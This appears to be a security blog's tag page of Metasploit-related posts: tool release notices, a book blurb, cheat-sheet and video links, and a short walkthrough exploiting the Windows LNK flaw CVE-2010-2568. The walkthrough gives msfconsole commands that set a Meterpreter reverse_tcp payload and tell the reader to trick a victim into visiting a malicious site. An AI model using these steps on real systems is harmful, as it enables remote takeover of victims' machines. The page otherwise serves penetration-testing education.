Posts tagged metasploit


BackTrack 5 R1 released






The BackTrack guys have released an updated version of BackTrack 5 with a lot of new tools and updates. For more information, check out the link below.


Metasploit: A Penetration Tester’s Guide Book Coming Soon



Metasploit: A Penetration Tester’s Guide will teach you how to:

  • Find and exploit unmaintained, misconfigured, and unpatched systems
  • Perform reconnaissance and find valuable information about your target
  • Bypass anti-virus technologies and circumvent security controls
  • Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery
  • Use the Meterpreter shell to launch further attacks from inside the network
  • Harness standalone Metasploit utilities, third-party tools, and plug-ins
  • Learn how to write your own Meterpreter post-exploitation modules and scripts


Exploiting Windows LNK vulnerability (CVE-2010-2568)


A new 0-day exploit has recently been detected that takes advantage of the way Windows incorrectly parses shortcuts, so that malicious code can be executed when the icon of a specially crafted shortcut is displayed. This can be exploited locally through a malicious USB drive, or remotely via network shares and WebDAV. Metasploit has recently pushed the exploit as an msf module. There is still no patch released for this vulnerability.
There are 2 ways to exploit this:

1) Keep these 2 files, the LNK file and the DLL, on the USB stick and run on the victim machine
2) Or trick the victim into accessing the malicious site.

We will use the 2nd method:

1) svn update (update your msf)
2) use windows/browser/ms10_xxx_windows_shell_lnk_execute
3) set payload windows/meterpreter/reverse_tcp
4) set LHOST (your IP)
5) set LPORT 1427 (any port)

Check out my video to accomplish the above method: Exploiting Windows LNK vulnerability (CVE-2010-2568)

Metasploit Framework 3.4.1 Released


The Metasploit Project is proud to announce the release of the Metasploit Framework version 3.4.1. As always, you can get it from our downloads page,

Security Assessment and Pentest tools Cheat Sheets


Got these from my old bookmarks. Below are some useful cheat sheets; let me know if you find any other cheat sheets and I will update the post.


Backtrack 4
Misc tools
Metasploit Meterpreter

Oracle Security

SQL Injection

Microsoft SQL, Sybase, MySQL, Oracle, PostgreSQL, DB2, Ingres
Bypass SQL Injection Filters
Packetlife Cheatsheets

Ed Skoudis’ Pentest Cheatsheets

Windows command-line tools
Netcat Cheat Sheet
Useful Attack Tools, Metasploit commands, HPing, FGDump

Reverse Engineering Malware Cheat Sheet

Security Architecture Cheat Sheet for Internet Applications

CEH cheatsheets from Mindcert

Metasploit MeterpreterClient wiki


Detailed Metasploit Meterpreter core commands.

Kudos to bond for sharing this link.

Exploitation Videos from Dino Dai Zovi


Found interesting videos on exploitation:

Dino Dai Zovi’s Memory Corruption 101

Basic debugging for exploit development

Exploitation 102

Exploit mitigations, shellcoding, and Metasploit with Dino Dai Zovi.
